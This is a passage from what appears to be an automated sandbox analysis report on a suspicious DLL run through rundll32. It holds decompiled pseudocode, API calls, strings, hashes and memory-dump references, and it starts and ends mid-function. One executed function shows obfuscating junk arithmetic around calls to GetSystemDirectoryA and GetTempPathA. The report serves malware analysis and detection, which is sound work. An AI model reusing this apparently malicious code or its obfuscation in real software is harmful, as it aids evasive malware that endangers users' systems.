							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t17 = _t17 | 0x00000001;
						__eflags = _t17;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				__eflags = _t26;
				goto L9;
			}

0x6e21dbb4
0x6e21dbb5
0x6e21dbbc
0x6e21dc62
0x6e21dc76
0x6e21dc7b
0x6e21dc7d
0x6e21dc83
0x6e21dc86
0x6e21dc88
0x6e21dc8a
0x6e21dc8a
0x6e21dc90
0x6e21dc95
0x6e21dc95
0x6e21dc7f
0x6e21dc7f
0x00000000
0x6e21dc7f
0x6e21dbc2
0x6e21dbc7
0x00000000
0x00000000
0x6e21dbcd
0x6e21dbd2
0x6e21dbd4
0x6e21dbd4
0x6e21dbda
0x00000000
0x00000000
0x6e21dbdf
0x6e21dbf6
0x6e21dbf6
0x6e21dbff
0x6e21dc01
0x00000000
0x00000000
0x6e21dc03
0x6e21dc08
0x6e21dc0a
0x6e21dc0a
0x6e21dc10
0x00000000
0x00000000
0x6e21dc15
0x6e21dc33
0x6e21dc33
0x6e21dc35
0x6e21dc5a
0x00000000
0x6e21dc5f
0x6e21dc52
0x00000000
0x00000000
0x6e21dc54
0x00000000
0x6e21dc54
0x6e21dc17
0x6e21dc1f
0x00000000
0x00000000
0x6e21dc21
0x6e21dc24
0x6e21dc2a
0x00000000
0x00000000
0x00000000
0x6e21dc2c
0x6e21dc2e
0x6e21dc30
0x6e21dc30
0x00000000
0x6e21dc30
0x6e21dbe1
0x6e21dbe9
0x00000000
0x00000000
0x6e21dbeb
0x6e21dbee
0x6e21dbf4
0x00000000
0x00000000
0x00000000
0x6e21dbf4
0x6e21dbfa
0x6e21dbfc
0x6e21dbfc
0x00000000

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,6E21DE50,?,00000050,?,?,?,?,?), ref: 6E21DC8A

Strings

OCP, xrefs: 6E21DC03
ACP, xrefs: 6E21DBCD

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: c84d1527493b51f6569ece9e767e8a1da9986feae1579f2e871e0b4c58f2ff79
Instruction ID: 9f17a92a16cda4825a0bcc254d2ae07db7a6c7eda77fa65fc14e89dd83e6a013
Opcode Fuzzy Hash: c84d1527493b51f6569ece9e767e8a1da9986feae1579f2e871e0b4c58f2ff79
Instruction Fuzzy Hash: AB21A366A5C10EE7D3548ED9C940BC763EBAB44B57F528C24EB0AD7208E762DB418A90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DFAE9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6E1DFAE9(void* __ebx, void* __edx, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t19;
				signed int _t20;
				signed int _t23;
				signed int _t24;
				signed int _t25;
				signed int _t26;
				signed int _t30;
				intOrPtr _t31;
				signed int _t34;
				void* _t49;
				signed int _t55;

				if( *0x6e286e51 == 0) {
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 == 0) {
						L4:
						_t19 = E6E1E079B();
						__eflags = _t19;
						if(_t19 == 0) {
							L9:
							_t20 =  *0x6e28506c; // 0x9881d723
							_push(_t49);
							_push(0x20);
							asm("ror eax, cl");
							_t23 = (_t20 & 0x0000001f | 0xffffffff) ^  *0x6e28506c;
							__eflags = _t23;
							_v16 = _t23;
							_v12 = _t23;
							_v8 = _t23;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_v16 = _t23;
							_v12 = _t23;
							_v8 = _t23;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							goto L10;
						} else {
							__eflags = _t55;
							if(_t55 != 0) {
								goto L9;
							} else {
								_t25 = E6E20A8CA(_t19, 0x6e286e54);
								__eflags = _t25;
								if(_t25 != 0) {
									L8:
									_t24 = 0;
								} else {
									_t26 = E6E20A8CA(_t25, 0x6e286e60);
									__eflags = _t26;
									if(_t26 == 0) {
										L10:
										 *0x6e286e51 = 1;
										_t24 = 1;
									} else {
										goto L8;
									}
								}
							}
						}
						return _t24;
					} else {
						__eflags = _t55 - 1;
						if(_t55 != 1) {
							E6E1E07A7(__edx, _t49, _t55, 5);
							asm("int3");
							E6E1E0990(__ebx, _t49, 0x6e282780, 8);
							_v8 = _v8 & 0x00000000;
							__eflags =  *0x6e1a0000 - 0x5a4d; // 0x5a4d
							if(__eflags != 0) {
								L19:
								_v8 = 0xfffffffe;
								_t30 = 0;
								__eflags = 0;
							} else {
								_t31 =  *0x6e1a003c; // 0x100
								__eflags =  *((intOrPtr*)(_t31 + 0x6e1a0000)) - 0x4550;
								if( *((intOrPtr*)(_t31 + 0x6e1a0000)) != 0x4550) {
									goto L19;
								} else {
									__eflags =  *((intOrPtr*)(_t31 + 0x6e1a0018)) - 0x10b;
									if( *((intOrPtr*)(_t31 + 0x6e1a0018)) != 0x10b) {
										goto L19;
									} else {
										_t34 = E6E1DF931(0x6e1a0000, _a4 - 0x6e1a0000);
										__eflags = _t34;
										if(_t34 == 0) {
											goto L19;
										} else {
											__eflags =  *(_t34 + 0x24);
											if( *(_t34 + 0x24) < 0) {
												goto L19;
											} else {
												_v8 = 0xfffffffe;
												_t30 = 1;
											}
										}
									}
								}
							}
							 *[fs:0x0] = _v20;
							return _t30;
						} else {
							goto L4;
						}
					}
				} else {
					return 1;
				}
			}

0x6e1dfaf6
0x6e1dfafd
0x6e1dfb00
0x6e1dfb02
0x6e1dfb09
0x6e1dfb09
0x6e1dfb0e
0x6e1dfb10
0x6e1dfb38
0x6e1dfb38
0x6e1dfb40
0x6e1dfb49
0x6e1dfb51
0x6e1dfb53
0x6e1dfb53
0x6e1dfb59
0x6e1dfb5c
0x6e1dfb5f
0x6e1dfb62
0x6e1dfb63
0x6e1dfb64
0x6e1dfb6a
0x6e1dfb6d
0x6e1dfb73
0x6e1dfb76
0x6e1dfb77
0x6e1dfb78
0x00000000
0x6e1dfb12
0x6e1dfb12
0x6e1dfb14
0x00000000
0x6e1dfb16
0x6e1dfb1b
0x6e1dfb21
0x6e1dfb23
0x6e1dfb34
0x6e1dfb34
0x6e1dfb25
0x6e1dfb2a
0x6e1dfb30
0x6e1dfb32
0x6e1dfb7a
0x6e1dfb7a
0x6e1dfb81
0x00000000
0x00000000
0x00000000
0x6e1dfb32
0x6e1dfb23
0x6e1dfb14
0x6e1dfb85
0x6e1dfb04
0x6e1dfb04
0x6e1dfb07
0x6e1dfb88
0x6e1dfb8d
0x6e1dfb95
0x6e1dfb9a
0x6e1dfba3
0x6e1dfbaa
0x6e1dfc09
0x6e1dfc09
0x6e1dfc10
0x6e1dfc10
0x6e1dfbac
0x6e1dfbac
0x6e1dfbb1
0x6e1dfbbb
0x00000000
0x6e1dfbbd
0x6e1dfbc2
0x6e1dfbc9
0x00000000
0x6e1dfbcb
0x6e1dfbd7
0x6e1dfbde
0x6e1dfbe0
0x00000000
0x6e1dfbe2
0x6e1dfbe2
0x6e1dfbe6
0x00000000
0x6e1dfbe8
0x6e1dfbe8
0x6e1dfbef
0x6e1dfbef
0x6e1dfbe6
0x6e1dfbe0
0x6e1dfbc9
0x6e1dfbbb
0x6e1dfc15
0x6e1dfc21
0x00000000
0x00000000
0x00000000
0x6e1dfb07
0x6e1dfaf8
0x6e1dfafb
0x6e1dfafb

Strings

Tn(n, xrefs: 6E1DFB44
`n(n, xrefs: 6E1DFB65

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: Tn(n$`n(n
API String ID: 0-2013517204
Opcode ID: a67b70733c7e2a9c387ae21831bc05a5e735ed5de6b4c4dfebe7aa221ac9da4f
Instruction ID: a743afd1c265a9cfc6ca234d763fe1ddabe393680eee35139bf46a47973bf8e6
Opcode Fuzzy Hash: a67b70733c7e2a9c387ae21831bc05a5e735ed5de6b4c4dfebe7aa221ac9da4f
Instruction Fuzzy Hash: 9011E732C20A199BCF40CEE8C8547CF77E6AB1A324F254155DC30EB281D6B0C6899BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C3751, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E6E1C3751(void* __ebx, signed int* __ecx, signed char* __edi, void* __esi) {
				signed int _t18;
				intOrPtr* _t26;
				signed int _t29;
				signed char _t33;
				void* _t35;
				signed char _t40;
				void* _t41;
				intOrPtr* _t42;

				E6E1E00E0(0x6e228012, __ebx, __edi, __esi, 0x38);
				_t40 = __ecx;
				_t33 =  *((intOrPtr*)(_t41 + 8));
				_t18 = _t33 & 0x000000ff;
				if(_t18 > 8) {
					 *__ecx =  *__ecx & 0x00000000;
					__eflags = _t33;
					if(_t33 != 0) {
						goto L4;
					} else {
						E6E1C1F9A(_t41 - 0x28, "961c151d2e87f2686a955a9be24d316f1362bf21 3.9.1");
						_t7 = _t41 - 4;
						 *_t7 =  *(_t41 - 4) & 0x00000000;
						__eflags =  *_t7;
						_t35 = _t41 - 0x44;
						E6E1C0C7C(__ebx, _t35, __edi, _t40,  *_t7);
						 *_t42 = 0x6e283430;
						E6E1E3D74(_t41 - 0x44, _t41 - 0x28);
						asm("scasb");
						asm("aaa");
						asm("sbb al, 0x6e");
						if(__eflags >= 0) {
							_t26 =  *((intOrPtr*)(_t42 + 4));
							 *_t26 =  *((intOrPtr*)(_t35 + 4));
							return _t26;
						} else {
							asm("sbb al, 0x6e");
							 *__edi =  *__edi ^ 0x0000001c;
							asm("outsb");
							 *__edi = _t40;
							asm("sbb al, 0x6e");
							asm("aaa");
							asm("sbb al, 0x6e");
							asm("pushfd");
							asm("aaa");
							asm("sbb al, 0x6e");
							asm("pushfd");
							asm("aaa");
							asm("sbb al, 0x6e");
							asm("movsd");
							asm("aaa");
							asm("sbb al, 0x6e");
							asm("aaa");
							asm("sbb al, 0x6e");
							_t29 =  *((intOrPtr*)(_t35 + 4)) - 0x10;
							__eflags = _t29;
							return _t29;
						}
					}
				} else {
					switch( *((intOrPtr*)(_t18 * 4 +  &M6E1C37E9))) {
						case 0:
							 *__esi =  *__esi & 0x00000000;
							goto L4;
						case 1:
							_t30 = E6E1C4B1C(__ebx, __edi, __ecx, _t43);
							goto L3;
						case 2:
							__eax = E6E1C4B64(__eflags);
							goto L3;
						case 3:
							__eax = E6E1C4B87(__ebx, __edi, __esi, __eflags);
							goto L3;
						case 4:
							 *__esi = 0;
							goto L4;
						case 5:
							 *__esi =  *__esi & 0x00000000;
							__esi[1] = __esi[1] & 0x00000000;
							goto L4;
						case 6:
							asm("xorps xmm0, xmm0");
							asm("movsd [esi], xmm0");
							goto L4;
						case 7:
							__eax = E6E1C4BCF(__eflags);
							L3:
							 *_t40 = _t30;
							L4:
							return E6E1E008A(_t40, _t31, _t37, _t40);
							goto L16;
					}
				}
				L16:
			}

0x6e1c3758
0x6e1c375d
0x6e1c375f
0x6e1c3762
0x6e1c3768
0x6e1c37b3
0x6e1c37b6
0x6e1c37b8
0x00000000
0x6e1c37ba
0x6e1c37c2
0x6e1c37c7
0x6e1c37c7
0x6e1c37c7
0x6e1c37cf
0x6e1c37d2
0x6e1c37da
0x6e1c37e2
0x6e1c37e9
0x6e1c37ea
0x6e1c37eb
0x6e1c37ed
0x6e1c3826
0x6e1c382d
0x6e1c382f
0x6e1c37ef
0x6e1c37ef
0x6e1c37f1
0x6e1c37f4
0x6e1c37f5
0x6e1c37f7
0x6e1c37fa
0x6e1c37fb
0x6e1c37fd
0x6e1c37fe
0x6e1c37ff
0x6e1c3801
0x6e1c3802
0x6e1c3803
0x6e1c3805
0x6e1c3806
0x6e1c3807
0x6e1c380a
0x6e1c380b
0x6e1c3810
0x6e1c3810
0x6e1c3813
0x6e1c3813
0x6e1c37ed
0x6e1c376a
0x6e1c376a
0x00000000
0x6e1c37ae
0x00000000
0x00000000
0x6e1c3771
0x00000000
0x00000000
0x6e1c3782
0x00000000
0x00000000
0x6e1c3789
0x00000000
0x00000000
0x6e1c3797
0x00000000
0x00000000
0x6e1c379c
0x6e1c379f
0x00000000
0x00000000
0x6e1c37a5
0x6e1c37a8
0x00000000
0x00000000
0x6e1c3790
0x6e1c3776
0x6e1c3776
0x6e1c3778
0x6e1c377f
0x00000000
0x00000000
0x6e1c376a
0x00000000

APIs

__EH_prolog3_GS.LIBCMT ref: 6E1C3758
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1C37E2

Strings

961c151d2e87f2686a955a9be24d316f1362bf21 3.9.1, xrefs: 6E1C37BA

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Exception@8H_prolog3_Throw
String ID: 961c151d2e87f2686a955a9be24d316f1362bf21 3.9.1
API String ID: 2985221223-1287915644
Opcode ID: 11be0a444a37f25cb8843a9a3e20c4937936be3d1ff3ff4755da340489256877
Instruction ID: 7994b61858e4c82c4b8ab1f20c9c6cd6458cc7842447dffe1bd79a77a21730aa
Opcode Fuzzy Hash: 11be0a444a37f25cb8843a9a3e20c4937936be3d1ff3ff4755da340489256877
Instruction Fuzzy Hash: 4E018BB1848704AFD302DBE4C4487ECB2E8AF37B16F21499AD180D2140EB7C0AC6EB53

Uniqueness

Uniqueness Score: -1.00%

Function 6E214B79, Relevance: 5.1, APIs: 4, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E214B79(void* __edx, short* _a4, char* _a8, int _a12, intOrPtr _a16) {
				char* _v8;
				int _v12;
				char _v16;
				char _v24;
				char _v28;
				void* __ebx;
				char _t34;
				int _t35;
				int _t38;
				long _t39;
				char* _t42;
				int _t44;
				int _t47;
				int _t53;
				intOrPtr _t55;
				void* _t56;
				char* _t57;
				char* _t62;
				char* _t63;
				void* _t64;
				int _t65;
				short* _t67;
				short* _t68;
				int _t69;
				intOrPtr* _t70;

				_t64 = __edx;
				_t53 = _a12;
				_t67 = _a4;
				_t68 = 0;
				if(_t67 == 0) {
					L3:
					if(_a8 != _t68) {
						E6E1F1F60(_t53,  &_v28, _t64, _a16);
						_t34 = _v24;
						__eflags = _t67;
						if(_t67 == 0) {
							__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
							if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
								_t69 = _t68 | 0xffffffff;
								_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t68, _t68);
								__eflags = _t35;
								if(_t35 != 0) {
									L29:
									_t28 = _t35 - 1; // -1
									_t69 = _t28;
									L30:
									__eflags = _v16;
									if(_v16 != 0) {
										_t55 = _v28;
										_t31 = _t55 + 0x350;
										 *_t31 =  *(_t55 + 0x350) & 0xfffffffd;
										__eflags =  *_t31;
									}
									return _t69;
								}
								 *((intOrPtr*)(E6E202281())) = 0x2a;
								goto L30;
							}
							_t70 = _a8;
							_t25 = _t70 + 1; // 0x1
							_t56 = _t25;
							do {
								_t38 =  *_t70;
								_t70 = _t70 + 1;
								__eflags = _t38;
							} while (_t38 != 0);
							_t69 = _t70 - _t56;
							goto L30;
						}
						__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
						if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
							_t69 = _t68 | 0xffffffff;
							_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t67, _t53);
							__eflags = _t35;
							if(_t35 != 0) {
								goto L29;
							}
							_t39 = GetLastError();
							__eflags = _t39 - 0x7a;
							if(_t39 != 0x7a) {
								L21:
								 *((intOrPtr*)(E6E202281())) = 0x2a;
								 *_t67 = 0;
								goto L30;
							}
							_t42 = _a8;
							_t57 = _t42;
							_v8 = _t57;
							_t65 = _t53;
							__eflags = _t53;
							if(_t53 == 0) {
								L20:
								_t44 = MultiByteToWideChar( *(_v24 + 8), 1, _t42, _t57 - _t42, _t67, _t53);
								__eflags = _t44;
								if(_t44 != 0) {
									_t69 = _t44;
									goto L30;
								}
								goto L21;
							} else {
								goto L15;
							}
							while(1) {
								L15:
								_t45 =  *_t57;
								_v12 = _t65 - 1;
								__eflags =  *_t57;
								if(__eflags == 0) {
									break;
								}
								_t47 = E6E218CAB(__eflags, _t45 & 0x000000ff,  &_v24);
								_t62 = _v8;
								__eflags = _t47;
								if(_t47 == 0) {
									L18:
									_t65 = _v12;
									_t57 = _t62 + 1;
									_v8 = _t57;
									__eflags = _t65;
									if(_t65 != 0) {
										continue;
									}
									break;
								}
								_t62 = _t62 + 1;
								__eflags =  *_t62;
								if( *_t62 == 0) {
									goto L21;
								}
								goto L18;
							}
							_t42 = _a8;
							goto L20;
						}
						__eflags = _t53;
						if(_t53 == 0) {
							goto L30;
						}
						_t63 = _a8;
						while(1) {
							 *_t67 =  *(_t68 + _t63) & 0x000000ff;
							__eflags =  *(_t68 + _t63);
							if( *(_t68 + _t63) == 0) {
								goto L30;
							}
							_t68 =  &(_t68[0]);
							_t67 =  &(_t67[1]);
							__eflags = _t68 - _t53;
							if(_t68 < _t53) {
								continue;
							}
							goto L30;
						}
						goto L30;
					}
					 *((intOrPtr*)(E6E202281())) = 0x16;
					return E6E20215B() | 0xffffffff;
				}
				if(_t53 != 0) {
					 *_t67 = 0;
					goto L3;
				}
				return 0;
			}

0x6e214b79
0x6e214b82
0x6e214b87
0x6e214b8a
0x6e214b8e
0x6e214b9d
0x6e214ba0
0x6e214bc0
0x6e214bc5
0x6e214bc8
0x6e214bca
0x6e214c98
0x6e214c9e
0x6e214cb3
0x6e214cbf
0x6e214cc5
0x6e214cc7
0x6e214cd6
0x6e214cd6
0x6e214cd6
0x6e214cd9
0x6e214cd9
0x6e214cdd
0x6e214cdf
0x6e214ce2
0x6e214ce2
0x6e214ce2
0x6e214ce2
0x00000000
0x6e214ce9
0x6e214cce
0x00000000
0x6e214cce
0x6e214ca0
0x6e214ca3
0x6e214ca3
0x6e214ca6
0x6e214ca6
0x6e214ca8
0x6e214ca9
0x6e214ca9
0x6e214cad
0x00000000
0x6e214cad
0x6e214bd0
0x6e214bd6
0x6e214c03
0x6e214c0f
0x6e214c15
0x6e214c17
0x00000000
0x00000000
0x6e214c1d
0x6e214c23
0x6e214c26
0x6e214c82
0x6e214c87
0x6e214c8f
0x00000000
0x6e214c8f
0x6e214c28
0x6e214c2b
0x6e214c2d
0x6e214c30
0x6e214c32
0x6e214c34
0x6e214c6a
0x6e214c78
0x6e214c7e
0x6e214c80
0x6e214c94
0x00000000
0x6e214c94
0x00000000
0x00000000
0x00000000
0x00000000
0x6e214c36
0x6e214c36
0x6e214c36
0x6e214c39
0x6e214c3c
0x6e214c3e
0x00000000
0x00000000
0x6e214c48
0x6e214c4f
0x6e214c52
0x6e214c54
0x6e214c5c
0x6e214c5c
0x6e214c5f
0x6e214c60
0x6e214c63
0x6e214c65
0x00000000
0x00000000
0x00000000
0x6e214c65
0x6e214c56
0x6e214c57
0x6e214c5a
0x00000000
0x00000000
0x00000000
0x6e214c5a
0x6e214c67
0x00000000
0x6e214c67
0x6e214bd8
0x6e214bda
0x00000000
0x00000000
0x6e214be0
0x6e214be3
0x6e214be7
0x6e214bea
0x6e214bee
0x00000000
0x00000000
0x6e214bf4
0x6e214bf5
0x6e214bf8
0x6e214bfa
0x00000000
0x00000000
0x00000000
0x6e214bfc
0x00000000
0x6e214be3
0x6e214ba7
0x00000000
0x6e214bb2
0x6e214b94
0x6e214b9a
0x00000000
0x6e214b9a
0x6e214cf1

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00000000,00000000,00000000,00000000,00000000,90EFF98A,90EFF98A,00000000,00000000,00000000,00000000,00000000), ref: 6E214C0F
GetLastError.KERNEL32 ref: 6E214C1D
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 6E214C78

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: b831570c26da9ca51d630a9a3157c34ea6dbe8a4de720837e15dfbd2bb11556b
Instruction ID: d4606820ad02b41b021931bd56f407ae649bb116670555c9f97a652c2e010253
Opcode Fuzzy Hash: b831570c26da9ca51d630a9a3157c34ea6dbe8a4de720837e15dfbd2bb11556b
Instruction Fuzzy Hash: 2E41F97560820FAFDB118FE5C844BEA7BFBEF41329F104159EA5DA7190D7328A02C7A0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 1532 Parent PID: 5300 rundll32.exeCOMMON

Executed Functions

Function 6E1C1285, Relevance: 40.8, APIs: 3, Strings: 20, Instructions: 597
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1C1285(void* __ebx, void* __edi, void* __esi) {
				signed int _t129;
				signed int _t131;
				signed int _t133;
				void* _t135;
				int _t139;
				signed int _t142;
				signed int _t146;
				void* _t149;
				signed int _t153;
				void* _t155;
				signed int _t156;
				void* _t164;
				signed int _t168;
				void* _t169;
				signed int _t171;
				void* _t174;
				signed int _t178;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t188;
				signed int _t190;
				signed int _t191;
				signed short* _t193;
				signed int _t195;
				void* _t197;
				signed int _t201;
				signed int _t202;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t216;
				void* _t229;
				signed int _t245;
				signed int _t256;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t268;
				void* _t270;
				signed int _t272;
				signed int _t277;
				void* _t281;
				signed int _t282;
				signed int _t286;
				signed int* _t287;
				signed int _t291;
				signed int _t294;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed int _t300;
				void* _t301;
				intOrPtr* _t303;
				signed int _t319;
				signed int _t327;
				signed int _t329;
				signed int _t333;
				signed int _t336;
				signed int _t342;
				signed short _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t354;
				signed int _t358;
				signed short* _t360;
				signed int _t362;
				signed int _t364;
				signed int _t369;
				signed int _t371;
				signed int _t372;
				signed int _t375;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t386;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t396;
				void* _t400;
				void* _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				void* _t405;
				signed int _t451;
				void* _t456;

				_t260 = __ebx;
				E6E1E00AC(0x6e227e6f, __ebx, __edi, __esi, 0x2c);
				_t261 =  *0x6e2859d8;
				_t380 =  *0x6e2859dc;
				_t358 =  *0x6e285a00;
				_t405 = 0 - _t380;
				_t327 =  *0x6e285a90;
				 *(_t400 - 0x18) =  *0x6e2859d0 +  *0x6e285a90 + 0x31f;
				_t129 = _t261;
				 *(_t400 - 0x2c) = _t129;
				 *(_t400 - 0x1c) = _t380;
				if(_t405 >= 0 && (_t405 > 0 || _t358 >= _t129)) {
					_push(0);
					_t358 = _t358 - _t129 * 0x3d + 0xfffffd1c;
					 *0x6e285a58 =  *0x6e285a58 + 0xfffffd1c;
					 *0x6e285a00 = _t358;
					asm("adc dword [0x6e285a5c], 0xffffffff");
					_t380 = 0;
					asm("sbb esi, [ebp-0x1c]");
					_t261 = _t358 -  *(_t400 - 0x2c) + 0x2e4;
					 *0x6e2859d8 = _t261;
					asm("adc esi, eax");
					 *0x6e2859dc = 0;
				}
				 *(_t400 - 0x28) =  *0x6e2859e6 & 0x0000ffff;
				_t131 = 0x6e2859e6;
				 *(_t400 - 0x2c) = 0x6e2859e6;
				 *(_t400 - 0x1c) = 0x6e2859e6;
				do {
					if(_t358 ==  *(_t400 - 0x28)) {
						goto L8;
					} else {
						asm("cdq");
						_t133 = E6E1E01E0( *_t131 & 0x0000ffff, _t327, _t261, _t380);
						_t380 = _t327;
						_t261 = _t133;
						_t327 = _t358 + 5 + _t261;
						 *0x6e2859d8 = _t261;
						 *0x6e2859dc = _t380;
						 *0x6e285a90 = _t327;
						if(_t327 != ( *0x6e2859f0 & 0x0000ffff)) {
							_t131 =  *(_t400 - 0x1c);
							goto L8;
						}
					}
					break;
					L8:
					_t131 = _t131 + 2;
					 *(_t400 - 0x1c) = _t131;
				} while (_t131 < 0x6e285a44);
				_t135 = 6;
				if( *0x6e285a98 != _t135 ||  *0x6e285a9c != 0) {
					_t262 = _t261 - 0x27 +  *(_t400 - 0x18) * 0x3d;
					__eflags = _t262;
					 *0x6e2859d8 = _t262;
					_t263 =  *(_t400 - 0x18);
					asm("sbb esi, edi");
					 *0x6e2859dc = _t380;
				} else {
					_t263 = _t261 + 0x11e05;
				}
				 *0x6e2859d0 = _t263 - _t327 * 0x3d - 0x2e4;
				_t139 = GetSystemDirectoryA(0x6e29c8d8, 0x56d);
				_t381 =  *0x6e285a00;
				_t266 = _t139;
				_t329 = 0;
				_t360 = 0x6e2859e6;
				 *0x6e285a90 = _t139 -  *0x6e285a90 +  *0x6e2859d0;
				_t142 =  *0x6e2859e6 & 0x0000ffff;
				 *0x6e2859d8 = _t139;
				 *(_t400 - 0x1c) = 0;
				 *0x6e2859dc = 0;
				do {
					if(_t381 == _t142) {
						goto L17;
					} else {
						asm("cdq");
						_t266 = E6E1E01E0( *_t360 & 0x0000ffff, _t329, _t266,  *(_t400 - 0x1c));
						_t256 = _t329;
						 *0x6e2859d8 = _t266;
						 *(_t400 - 0x1c) = _t256;
						_t381 = _t381 + 5 + _t266;
						 *0x6e2859dc = _t256;
						 *0x6e285a90 = _t381;
						if(_t381 != ( *0x6e2859f0 & 0x0000ffff)) {
							_t381 =  *0x6e285a00;
							_t142 =  *0x6e2859e6 & 0x0000ffff;
							goto L17;
						}
					}
					break;
					L17:
					_t360 =  &(_t360[1]);
				} while (_t360 < 0x6e285a44);
				 *0x6e2859d0 = E6E1C0D32();
				GetTempPathA(0x56d, 0x6e29c218);
				if( *0x6e285a04 == 0x1b47) {
					_t319 =  *0x6e285a90 + ( *0x6e2859e6 & 0x0000ffff);
					 *0x6e285a90 = _t319;
					_push(0);
					asm("adc [0x6e2859dc], eax");
					 *0x6e2859d8 =  *0x6e2859d8 + 0x3b + _t319 * 2;
				}
				_t146 = E6E1C0D32();
				_t402 = _t401 - 0x10;
				 *0x6e2859d0 = _t146;
				_t268 = _t402;
				 *(_t400 - 0x34) = _t402;
				_t330 = "6265";
				 *_t268 = 0;
				 *((intOrPtr*)(_t268 + 8)) = 0;
				 *((intOrPtr*)(_t268 + 0xc)) = 0;
				E6E1C5DAB(_t268, "6265");
				_push("Had s");
				 *(_t400 - 4) = 0;
				_t149 = E6E1C4197(_t260, "6265", 0, _t381);
				 *(_t400 - 4) =  *(_t400 - 4) | 0xffffffff;
				E6E1C1E10(_t149);
				_t270 = 6;
				if( *0x6e285a02 == _t270) {
					_t153 =  *0x6e2859d8 + 0x11dde +  *0x6e2859d0;
					__eflags = _t153;
					 *0x6e285a90 = _t153;
				} else {
					 *0x6e2859d0 =  *0x6e2859d0 +  ~( *0x6e2859d8) -  *0x6e285a90 * 0x3d;
				}
				_push("cd Island"); // executed
				E6E20179F(_t260, _t330, 0, _t381); // executed
				_t382 =  *0x6e2859d0;
				_t155 = 6;
				_t272 = _t382 - 0x338;
				 *0x6e285a90 = _t272;
				_t419 =  *0x6e285a02 - _t155;
				if( *0x6e285a02 == _t155) {
					_t156 = 0;
					 *0x6e2859dc = 0;
					_t333 =  *0x6e285a00 + 0x11dde + _t272;
